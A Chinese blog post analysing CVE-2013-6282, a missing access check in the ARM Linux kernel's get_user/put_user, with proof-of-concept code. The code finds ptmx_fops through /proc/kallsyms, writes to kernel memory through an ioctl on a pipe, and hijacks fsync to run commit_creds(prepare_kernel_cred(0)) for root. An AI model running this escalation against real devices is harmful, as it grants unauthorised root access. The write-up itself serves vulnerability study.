/*

本文章由 莫灰灰 编写,转载请注明出处。

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

1.漏洞成因

Linux kernel对ARM上的get_user/put_user缺少訪问权限检查,本地攻击者可利用此漏洞读写内核内存,获取权限提升。

2.受影响的系统

Linux kernel 3.2.2

Linux kernel 3.2.13

Linux kernel 3.2.1

3.PoC分析

(1)从/proc/kallsyms文件里获得数据结构ptmx_fops的地址

void *ptmx_fops = kallsyms_get_symbol_address("ptmx_fops");

unsigned int ptmx_fops_fsync_address = (unsigned int)ptmx_fops + 0x38;
static void *kallsyms_get_symbol_address(const char *symbol_name)

{

	FILE *fp;

	char function[BUFSIZ];

	char symbol;

	void *address;

	int ret;

	fp = fopen("/proc/kallsyms", "r");

	if (!fp) {

		printf("Failed to open /proc/kallsyms due to %s.", strerror(errno));

		return 0;

	}

	while(!feof(fp)) {

		ret = fscanf(fp, "%p %c %s", &address, &symbol, function);

		if (ret != 3) {

			break;

		}

		if (!strcmp(function, symbol_name)) {

			fclose(fp);

			return address;

		}

	}

	fclose(fp);

	return NULL;

}

(2)找到fsync的地址,即ptmx_fops+0x38的地方

static struct file_operations ptmx_fops;
struct file_operations {

	struct module *owner;

	loff_t (*llseek) (struct file *, loff_t, int);

	ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);

	ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);

	ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);

	ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);

	int (*iterate) (struct file *, struct dir_context *);

	unsigned int (*poll) (struct file *, struct poll_table_struct *);

	long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);

	long (*compat_ioctl) (struct file *, unsigned int, unsigned long);

	int (*mmap) (struct file *, struct vm_area_struct *);

	int (*open) (struct inode *, struct file *);

	int (*flush) (struct file *, fl_owner_t id);

	int (*release) (struct inode *, struct file *);

	int (*fsync) (struct file *, loff_t, loff_t, int datasync);

	int (*aio_fsync) (struct kiocb *, int datasync);

	<span style="color:#ff0000;"><strong>int (*fasync) (int, struct file *, int);</strong></span>

	int (*lock) (struct file *, int, struct file_lock *);

	ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);

	unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);

	int (*check_flags)(int);

	int (*flock) (struct file *, int, struct file_lock *);

	ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);

	ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);

	int (*setlease)(struct file *, long, struct file_lock **);

	long (*fallocate)(struct file *file, int mode, loff_t offset,

			  loff_t len);

	int (*show_fdinfo)(struct seq_file *m, struct file *f);

};

(3)替换fsync函数指针为自己的函数

if(pipe_write_value_at_address( ptmx_fops_fsync_address,(unsigned int)&ptmx_fsync_callback )){

ptmx_fsync_callback函数能够使本进程得到权限提升

/* 	obtain_root_privilege - userland callback function

We set ptmx_fops.fsync to the address of this function

Calling fysnc on the open /dev/ptmx file descriptor will result

in this function being called in the kernel context

We can the call the prepare/commit creds combo to escalate the

processes priveledge.

*/

static void ptmx_fsync_callback(void)

{

	commit_creds(prepare_kernel_cred(0));

}

pipe_write_value_at_address函数底层通过put_user函数改写内核地址内容

static unsigned int pipe_write_value_at_address(unsigned long address, unsigned int value)

{

	char data[4];

	int pipefd[2];

	int i;

	*(long *)&data = value;

	if (pipe(pipefd) == -1) {

		perror("pipe");

		return 1;

	}

	for (i = 0; i < (int) sizeof(data) ; i++) {

		char buf[256];

		buf[0] = 0;

		if (data[i]) {

			if (write(pipefd[1], buf, data[i]) != data[i]) {

				printf("error in write().\n");

				break;

			}

		}

		if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {

			perror("ioctl");

			break;

		}

		if (data[i]) {

			if (read(pipefd[0], buf, sizeof buf) != data[i]) {

				printf("error in read().\n");

				break;

			}

		}

	}

	close(pipefd[0]);

	close(pipefd[1]);

	return (i == sizeof (data));

}

(4)手动调用fsync函数,触发自己的hook函数,得到权限提升

int fd = open(PTMX_DEVICE, O_WRONLY);

if(!fd) return 1;

fsync(fd);

close(fd);

4.修复

在put_user之前加了个地址推断

Missing access checks in put_user/get_user kernel API (CVE-2013-6282)的更多相关文章

  1. linux kernel API and google android compile guide

    (1)linux kernel API website: http://docs.knobbits.org/local/linux-doc/html/regulator/index.html http ...

  2. Access Toke调用受保护的API

    ASP.NET Web API与Owin OAuth:使用Access Toke调用受保护的API 在前一篇博文中,我们使用OAuth的Client Credential Grant授权方式,在服务端 ...

  3. ASP.NET Web API与Owin OAuth:使用Access Toke调用受保护的API

    在前一篇博文中,我们使用OAuth的Client Credential Grant授权方式,在服务端通过CNBlogsAuthorizationServerProvider(Authorization ...

  4. Linux kernel API的查看

    一般来说Linux上查看一些函数API的说明咱们可以man一下.man 2是syscall,man 3是一些库的函数API. 以下是man sections的一些说明 The table below ...

  5. Linux Kernel API

    记录一些Linux Device Drivers中常用的API. Linux官方提供的内核文档: 1. 最新版: https://www.kernel.org/doc/html/latest/ 2. ...

  6. shell定时统计Nginx下access.log的PV并发送给API保存到数据库

    1,统计PV和IP 统计当天的PV(Page View) cat access.log | sed -n /`date "+%d\/%b\/%Y"`/p |wc -l 统计某一天的 ...

  7. How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038

    http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html ...

  8. facebook api之Access Tokens

    Access Tokens When someone connects with an app using Facebook Login and approves the reqest for per ...

  9. 使用Flask设计带认证token的RESTful API接口[翻译]

    上一篇文章, 使用python的Flask实现一个RESTful API服务器端  简单地演示了Flask实的现的api服务器,里面提到了因为无状态的原则,没有session cookies,如果访问 ...

随机推荐

  1. K2 blackpearl 安装

    转:http://blog.csdn.net/gxiangzi/article/details/8432188 K2是国外的一款BPM引擎,基于MS的Workflow,关于它的详细介绍在我之前一片博客 ...

  2. Java 单元测试(Junit)

    在有些时候,我们需要对我们自己编写的代码进行单元测试(好处是,减少后期维护的精力和费用),这是一些最基本的模块测试.当然,在进行单元测试的同时也必然得清楚我们测试的代码的内部逻辑实现,这样在测试的时候 ...

  3. android 应用页面与数据申请逻辑剥离;

    1.页面与数据申请剥离,数据申请框架可以灵活更换,解耦合: 2.对应页面的数据申请类中,将返回数据解析剥离,灵活更换数据返回及对应解析: 二.模块划分: 1.一些通用的工具类,可以考虑迁移到com.c ...

  4. 为在MyEclipse中配置Tomcat服务器郁闷的朋友们解决郁闷

    是不是很郁闷!为了在MyEclipse配置Tomcat 服务器,竟然弄了你几乎一个上午,最后也没弄成功,也许你本该早注意到Tomcat 5.x要有这个JDK的支持,配置才能成功. 一上午辛辛苦苦也没解 ...

  5. 《Python基础教程(第二版)》学习笔记 -> 第十一章 文件和素材

    打开文件 open函数用来打开文件,语句如下: open(name[,mode[,buffering]]) open函数使用一个文件名作为唯一的强制参数,然后后返回一个文件对象.模式(mode)和缓冲 ...

  6. Ubuntu 14.04配置FTP服务器

    搭建: 1.sudo apt-get update                                        #更新软件 2.sudo apt-get install vsftpd ...

  7. linux交叉环境的搭建以及嵌入式开发概述

    嵌入式开发概述 由嵌入式本身的特性所影响,嵌入式系统开发与通用系统的开发有很大的区别,嵌入式的开发分为系统总体开发,嵌入式硬件开发,嵌入式系统软件开发3大部分 在系统总体开发中,由于嵌入式系统与硬件依 ...

  8. 你认为你很了解Javascript?

    (翻译不当之处请谅解) 来源:http://www.ido321.com/914.html 这里有5个小脚本,有助于你真正理解JavaScript核心–闭包和作用域.没有在控制台运行之前,尝试回答每个 ...

  9. 重新执笔,已是大三!Jekyll自定义主题开发

    前言 “一转眼忘了时间 丢了感觉 黑了世界 再逞强 再疯狂 也会伤 不知 不觉 后知 后觉 然后 发现 失去 知觉 ”——<一吻不天荒> 感言 时间是把双刃剑,什么解决不了,忧烦的,慢慢变 ...

  10. hdfs 数据块重分布 sbin/start-balancer.sh -threshold

    数据块重分布sbin/start-balancer.sh -threshold <percentage of disk capacity>percentage of disk capa ...